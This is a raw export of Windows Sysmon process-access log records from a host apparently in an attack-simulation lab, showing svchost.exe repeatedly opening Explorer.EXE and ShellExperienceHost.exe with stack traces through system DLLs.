21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152131Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152130Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152129Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152128Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152127Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152126Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152125Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152124Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152123Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152122Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152121Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152120Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152119Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152118Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152117Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152116Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152115Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152114Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152113Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152112Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152111Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152110Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152109Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152108Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152107Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152106Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152105Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152104Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152103Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152102Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152101Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152100Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 